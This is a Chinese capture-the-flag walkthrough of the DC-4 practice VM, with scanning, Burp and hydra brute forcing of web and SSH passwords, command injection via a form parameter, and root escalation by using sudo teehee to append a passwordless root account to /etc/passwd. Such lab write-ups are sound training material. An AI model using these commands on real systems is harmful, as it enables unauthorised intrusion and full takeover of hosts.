目录

DC-4靶机渗透测试

信息收集

web渗透


DC-4靶机渗透测试

DC-4对于我们来说同样是黑盒测试

DC-4靶机MAC地址:00:0C:29:86:67:2E

kali2021:192.168.3.222/24

信息收集

1、由DC-4的mac地址获取ip

nmap -sP 192.168.3.1/24 -oN nmap.sP    得知DC-4的IP为192.168.3.145

2、扫描主机所开放的端口

nmap -A 192.168.3.145 -p 1-65535 -oN nmap.A  (得知目标开放了22端口和80端口,并且80端口使用的web容器是nginx,22端口所用组件是openSSH 7.4)

3、通过浏览器去访问80端口

提示可用admin来登录,尝试做爆破

web渗透

1、密码爆破

上面提示用户名为admin,尝试使用hydra来密码爆破

这里演示用burp suite进行爆破:

把抓到的包放到intruder模块,做爆破!
这个爆破的密码字典在哪?来到kali里面

密码字典在/usr/share/john目录下有一个password.lst,用finalshell下载到本地

来到intruder模块,clear $,爆破的是密码,把密码Add $,来到payloads,把字典载入

可以点击attack进行爆破,爆破之前点击options,选择线程(给500),start Attack(社区版好像不让设置线程),爆破后得知密码是happy

利用密码登录网站

2、后台操作

登录后台后发现命令执行

接下来我们抓一下包,看看命令是怎么执行的

将包发送到repeater模块

这里ls -l就可以执行一些系统命令了,可以把这些命令换成别的,换成whoami,发现能够执行

这样就可以判断这里存在命令注入漏洞!

接下来:radio=cat+/etc/passwd,发现了charles,jim,sam这三个用户,并且都存在家目录

我们查看一下家目录中的文件:radio=ls+-al+/home

依次看看那三个用户的家目录:ls -al /home/charles,一个一个看

发现在Charles中没有特殊的文件,jim中有

我们看看backups命目录下面有什么,看到一个旧密码备份文件,我们看一下

将这些密码复制到kali 创建密码字典

再创建一个用户字典,把那三个用户写进去

已经有用户名,密码,并且开放了22端口,尝试爆破(hydra)

hydra -L user.dic -P old-passwords.bak ssh://192.168.3.145 -vV -o hydra.ssh

找到了用户名和密码,尝试登陆(jim | jibril04)

cd /var/mail

cat jim

发现Charles直接把密码发给jim了,Password is:  ^xHhA&hvim0y

尝试登陆ssh

ssh charles@192.168.3.145

查看可以不需要密码就可以使用root权限执行的命令(guid)

sudo -l

看一下charles用户能不能sudo

发现teehee这个命令在执行期间不需要输入root用户密码

teehee --help

查看帮助信息,这条命令可以在任意文件的最后追加命令

在passwd 文件末尾追加

sudo teehee -a /etc/passwd

waffle::0:0:::/bin/bash

或者 echo "waffle::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

cat /etc/passwd

尝试ssh登陆:

ssh waffle@192.168.3.145

不过不知道我的出了什么问题导致无法这样创建一个免密的root账号,每次都会叫我输入密码,不过看网上的大部分人都成功了,就还是记录上去

获得root权限后去/root目录下查看flag

【CyberSecurityLearning 73】DC系列之DC-4渗透测试相关推荐

  1. 【小白渗透入门系列】P5 自动化渗透测试工具

    大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 未经允许,禁止转载 ,违者必究!!!! 本实验仅适用于学习和测试 ,严禁违法操作 ! ! ! 今天更新的是: P5 自动化渗 ...

  2. 网络安全系列-VIII: 什么是渗透测试 Penetration Test?

    什么是渗透测试? 概念及流程 渗透测试: Penetration Test, 是指用黑客的方式攻击你自己或客户的IT系统,来找到其中的安全漏洞.是安全评估的一种手段,目的是为了提高系统的安全性 渗透测 ...

  3. 【DC系列】DC-4靶机渗透练习

    1.主机发现:sudo arp-scan -l,发现靶机ip为192.168.225.143 2.扫描端口,开启了80端口 nmap 192.168.225.143 -sV -sC -Pn -n -v ...

  4. kali渗透测试系列---信息收集

    kali 渗透测试系列 文章目录 kali 渗透测试系列 信息收集 信息收集 信息收集阶段可以说是在整个渗透测试或者攻击很重要的阶段,毕竟知己知彼才能百战百胜,否则从目标主机使用的平台到数据库的使用再 ...

  5. 【CyberSecurityLearning 74】DC系列之DC-5渗透测试

    目录 DC系列之DC-5渗透测试 实验环境: 实验步骤: 1.主机扫描,确定目标主机IP 2.对DC-5进行端口扫描 3.访问DC-5的web服务,了解相关信息 4.使用wfuzz测试页面参数 5.看 ...

  6. 【CyberSecurityLearning 78】DC系列之DC-9渗透测试

    目录 DC-9靶机渗透测试 1.信息收集 1.1 扫描开放的端口 1.2 访问WEB站点 2. SQL注入 3.admin登录后台 4.尝试文件包含 4.1 利用 LFI 查看 /etc/knockd ...

  7. 【CyberSecurityLearning 77】DC系列之DC-8渗透测试(Drupal)

    目录 DC-7靶机渗透测试 1.信息收集 1.1 扫描DC-8开放端口 1.2 访问WEB站点 2.渗透过程 2.1 用Sqlmap自动化工具注入 2.2 drush 命令对任意用户密码进行更改(发现 ...

  8. 【CyberSecurityLearning 76】DC系列之DC-7渗透测试(Drupal)

    目录 DC-7靶机渗透测试 1.信息收集 1.1 扫描开放的端口 1.2 访问WEB站点 2.登录ssh 3. 提权(suid提权) 3.1 exim4提权 4.drush 命令对任意用户密码进行更改 ...

  9. 【CyberSecurityLearning 75】DC系列之DC-6渗透测试(WordPress)

    目录 DC-6靶机渗透测试 1.信息收集 1.1 发现DC-6的IP地址 1.2 扫描开放端口 1.3 访问web网页(添加本地DNS解析) 1.4 Wpscan扫描站点(用户名) 2.WEB渗透 2 ...

最新文章

  1. 搭建Docker私有仓库--自签名方式
  2. java redis缓存理解_Java项目中使用Redis缓存案例
  3. 网络与IO知识扫盲(五):从 NIO 到多路复用器
  4. ABAP webdynpro的view navigation和WebUI的view navigation
  5. android 特效绘图,Android绘图机制与处理技巧——Android图像处理之图形特效处理...
  6. rootfs 制作ubuntu_为n1制作aarcm64/arm64 ubuntu rootfs系统
  7. C#基础加强_泛型的基本原理
  8. 4本数据库新书,大神都在追着看
  9. mvp模式 php,Hyper-V - 增强会话模式
  10. cp: 略过目录XXXXXX
  11. MySQL临时表的使用
  12. 第三十八章 SQL命令 DROP TABLE
  13. 普度大学计算机科学博士,Purdue的Computer Sciences「普渡大学西拉法叶分校计算机科学系」...
  14. 瑞吉外卖项目学习笔记01
  15. 想要做大事,就要有高效的协作机制
  16. Android仿制知乎滑动广告条
  17. class文件格式解析
  18. Java中用Apache POI生成excel和word文档
  19. 优思学院|浅谈六西格玛培训
  20. html.renderpartial 命名空间,Html.RenderPartial的三个参数的用法 用法实例

热门文章

  1. hdu 1576(拓展欧几里得)
  2. NYOJ练习题 下三角矩形 (模拟)
  3. phpstrom安装bootstrap3插件
  4. ActiveMQ broker 集群, 静态发现和动态发现
  5. 第1次作业:谈谈我的看法与感想
  6. php 7.1安装教程
  7. 1313 质因数分解 2012年NOIP全国联赛普及组
  8. bzoj2333[SCOI2011]棘手的操作
  9. 解决 Eclipse 项目有红感叹号的方法
  10. Linux中的SELinux与chcon以及Samba实现【转】